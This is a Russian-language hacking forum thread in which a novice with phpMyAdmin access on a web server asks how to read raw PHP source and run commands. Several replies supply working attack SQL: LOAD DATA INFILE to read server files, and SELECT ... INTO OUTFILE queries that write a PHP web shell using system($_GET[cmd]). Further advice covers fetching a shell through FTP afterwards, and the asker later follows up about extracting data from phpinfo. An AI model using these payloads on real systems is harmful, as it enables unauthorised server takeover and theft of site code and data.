Здравствуйте... у меня такой вопорс к экспертам форума... у меня есть phpMyAdmin...могу зайти в тестовом режиме...и могу выполнять SQL запросы...можно ли сформировать такой запрос чтобы, допустим качнуть файл из директории /home/docs/htdocs/index.php в его чистом виде...т.е до обработки его сервером. если да то помогите составить запрос...или как выполнить какую-нибдуь команду... Заранее спасибо...надеюсь на фашу помощь... С наилучшими пожеланиями!
Читай статью про MySQL у меня в подписи. Вкратце: В phpmyadmin есть функция выполнения произвольного SQL кода. Тебе нужно знать лишь установочную дирректорию сайта. Дальше лазишь по phpmyadmin и находишь таблицу и смотришь колличество ее столбцов. и составляешь запрос по типу UNION SELECT 1,2,3...кол-во столбцов и в последнем <?php system($_GET[c]);?> FROM имя_таблицы INTO OUTFILE тут_в_одинарных_ковычках_путь_к_файлу_куда_писать НО! данная вещь сработает только если у твоего юзера есть права file_priv
nc.STRIEM ..наверно очень глупый вопрос,но все же как залить файл на сервак если у меня нету прав админа...у меня есть только строка выполняющая мои SQL запросы...очень плохо шарю в MySQL... LoFFi твой способ еще не порбывал не было времени, но всеравно спасибо... заранее спасибо
после этого ты получаеш доступ к cmd! далее можеш поднять ftp на своем компе, это можно сделать при помощи RPC GUI после чего, использую команды cmd залить шел!
Прочитать файл можно и в MySQL. Code: CREATE TABLE `c` (`t` TEXT); LOAD DATA INFILE '/home/.../admin.php' INTO TABLE `c`; SELECT * FROM `c`; А запись шелла делается проще - Code: SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/home/.../shell.php'; Безо всяких 1,2,3.. и FROM `table`
всем большое спасибо... но мне сервер выдает постоянно ошибку...т.е базы он создает...но не выполняет нужный код Code: CREATE TABLE `c` (`t` TEXT); LOAD DATA INFILE '/home/.../admin.php' INTO TABLE `c`; SELECT * FROM `c`; т.е. первую и последнию строку он читает а вот второрую нет и от вечает мне Code: #1045 - Access denied for user ''@'localhost' (using password: NO) получается он фильтрует данную шнягу,а еще вопрос можно через SQL-запрос поставить пасс на весь аккаунт БД,может он тогда успокоится, или проще забить?
>#1045 - Access denied for user ''@'localhost' (using password: NO) Запрещена работа с файлами, так что ты ничего не прочитаеш и не сохраниш >можно через SQL-запрос поставить пасс на весь аккаунт БД Если у тебя есть доступ к БД mysql то можеш, если полный доступ, то можеш и права на запись поставить, хотя в этом сильно сомневаюсь.
ладно чуваки большое спасибо за помощь....обидно... ну ничто долаем=)) ...я думаю тема закрыта... С наилучшими пожеланиями!
Он сказал, что у него phpMyAdmin. Там выполнить это не вопрос. Вот не под рутом: Насчет того, что select не выполнится без from - кому курить мануал еще вопрос....
я смотрю у вас такой спор... так что можно про это все забыть? а и еще один вопросик...можно ли что-то вытащить из phpinfo.php файла? заранее спасибо. P.S.: Извиняюсь за может быть глупые вопросы...новичек в MySQL+php